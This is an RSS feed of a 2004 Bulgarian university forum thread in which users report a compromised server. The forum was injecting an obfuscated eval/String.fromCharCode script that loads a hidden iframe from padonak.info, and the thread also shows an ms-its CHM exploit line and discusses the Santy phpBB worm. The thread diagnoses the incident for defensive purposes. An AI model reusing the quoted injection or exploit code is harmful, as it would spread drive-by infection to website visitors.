<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
	<title>Latest posts from topic “Проблем с форума”</title>
	<description>Latest posts from topic “Проблем с форума” on “forum.uni-sofia.bg”.</description>
	<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;t=407</link>
	<atom:link href="https://forum.su.schools.bg/generate_feed.php?content=topic_posts&amp;f%5B%5D=2&amp;t=407" rel="self" type="application/rss+xml" />
	<lastBuildDate>Thu, 23 Dec 2004 01:28:06 +0200</lastBuildDate>

	
		<item>
			<dc:creator>icaci</dc:creator>
			<pubDate>Thu, 23 Dec 2004 12:07:42 +0200</pubDate>
			<guid>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3195#p3195</guid>
			<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3195#p3195</link>
			<title></title>
			<description><![CDATA[Ааааа, register_globals... ясно <img src="https://forum.su.schools.bg/images/smilies/icon_smile.gif" alt=":)" title="Smile" />]]></description>
		</item>
	
		<item>
			<dc:creator>dimo</dc:creator>
			<pubDate>Thu, 23 Dec 2004 08:53:13 +0200</pubDate>
			<guid>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3190#p3190</guid>
			<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3190#p3190</link>
			<title></title>
			<description><![CDATA[Форума е с последна версия, както и PHP-то, но заради сайта на Философския факултет, който изисква register_globals=on, което е най-опасното в света на PHP, и разни други сайтчета, които който както си иска е писал, а трябва да се хостват при мен, май сървъра донякъде прилича на сирене (от това с дупките). Аз бях направил каквото мога след като имаше подобен проблем преди месец, но май този път ще трябва да предприема по-крути мерки! Но ще е след празниците - сега засега това вирусче съм го махнал отново.]]></description>
		</item>
	
		<item>
			<dc:creator>stone</dc:creator>
			<pubDate>Thu, 23 Dec 2004 08:45:57 +0200</pubDate>
			<guid>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3189#p3189</guid>
			<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3189#p3189</link>
			<title></title>
			<description><![CDATA[При мен не е имало подобен проблем!
<br />
 Но в мрежата се разпространява нов вирус от типа “червей”, който идентифицира потенциалните си жертви, като търси чрез Google сред форумите, използващи уязвима за атаки версия на софтуера phpBB.
<br />

<br />
Новият червей, който се нарича Santy, използва дупка в сигурността на популярния софтуер за форуми, известен под името PHP Bulletin Board (phpBB), за да заразява нови компютри. Вирусът използва Google, за да търси сайтове, на които е инсталирана подходяща за целта версия на продукта.
<br />
Червеят изпраща на търсачката специфична заявка, чрез която получава списък със сайтове, които са уязвими. След това той използва дупка в сигурността на форума, за да зарази компютъра. Това вероятно е първата програма, която използва търсачката Google, за да търси потенциални жертви за атака. След заразяването тя изтрива целия форум и добавя текста "NeverEverNoSanity".
<br />
Около 6 милиона сайта по света използват софтуера за форуми phpBB. Анализ на експерти показва, че се използва съвсем нова уязвимост, която бе открита миналата седмица. Вече е достъпна нова версия на софтуера, в която опасността е преодоляна.
<br />

<br />
Ако не сте ъпдейтнали форума - направете го!]]></description>
		</item>
	
		<item>
			<dc:creator>icaci</dc:creator>
			<pubDate>Thu, 23 Dec 2004 02:40:44 +0200</pubDate>
			<guid>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3188#p3188</guid>
			<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3188#p3188</link>
			<title></title>
			<description><![CDATA[Всъщност вече сън мапълно убеден, че проблемът не е в моя телевизор - същия JavaScript се появява и когато достъпвам форума от Unix машина в университета с текстов браузър без поддържка на JavaScript, известен с името wget  <img src="https://forum.su.schools.bg/images/smilies/icon_biggrin.gif" alt=":D" title="Very Happy" />  Интересното е, че не на всяка заявка се получава "заразена" версия, но средно по една на всеки 5 до 10 заявки е такава.
<br />
Като гледам наличието на DOCTYPE след JavaScript-а, то явно този код се добавя след като PHP-то изгенерира WEB страницата. Взимайки предвид различните пътища, по които минават пакетите до тук и до машината в университета, то проблемът явно е на самият WEB сървър. И тъй като смятам, че в УИЦ работят специалисти, то вероятността някой да е хакнал тези машините е минимална, и ... това ме навежда на някои много тревожни мисли.  <img src="https://forum.su.schools.bg/images/smilies/icon_evil.gif" alt=":evil:" title="Evil or Very Mad" />]]></description>
		</item>
	
		<item>
			<dc:creator>icaci</dc:creator>
			<pubDate>Thu, 23 Dec 2004 01:28:06 +0200</pubDate>
			<guid>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3187#p3187</guid>
			<link>https://forum.su.schools.bg/viewtopic.php?f=2&amp;p=3187#p3187</link>
			<title>Проблем с форума</title>
			<description><![CDATA[Димо, нормално ли е форумът да връща следния HTML в някои от категориите?:
<br />
<div class="quotetitle"><b>Quote:</b></div><div class="quotecontent">&lt;script language=javascript&gt;eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,<br />
105,116,101,40,39,60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,49,32,119,105,<br />
100,116,104,61,49,32,115,114,99,61,104,116,116,112,58,47,47,112,97,100,111,110,97,107,46,<br />
105,110,102,111,47,102,97,47,32,62,60,47,105,102,114,97,109,101,62,39,41,59))&lt;/script&gt;&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;<br />
&lt;html dir="ltr"&gt;<br />
&lt;head&gt;<br />
...<br />
</div><br />
и да ми стартира Java виртуалната машина (добре, че Sun-ската Java за разлика от Microsoft-ската показва иконка в трей-бара)?  <img src="https://forum.su.schools.bg/images/smilies/icon_eek.gif" alt=":shock:" title="Shocked" />  При това в JavaScript конзолата на Firefox-а получавам съобщения от вида:<br />
<div class="quotetitle"><b>Quote:</b></div><div class="quotecontent">Error: invalid quantifier {<br />
Source File: <!-- m --><a class="postlink" href="http://padonak.info/fa/x.htm" rel="nofollow" target="_blank">http://padonak.info/fa/x.htm</a><!-- m --><br />
Line: 6, Column: 33<br />
Source Code:<br />
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://padonak.info/fa/x.chm::/x.htm'));<br />
</div>
<br />

<br />
Добре, че ползвам Firefox, а не IE, и както изглежда повредата този  път не е в моя телевизор, тъй като това става само когато посещавам този форум  <img src="https://forum.su.schools.bg/images/smilies/icon_biggrin.gif" alt=":D" title="Very Happy" />
<br />

<br />
Ето как изглеждат нещата в действителност:
<br />
<img src="http://cluster.phys.uni-sofia.bg/hristo/evil-bug.png" alt="Изображение" />[/img]]]></description>
		</item>
	
</channel>
</rss>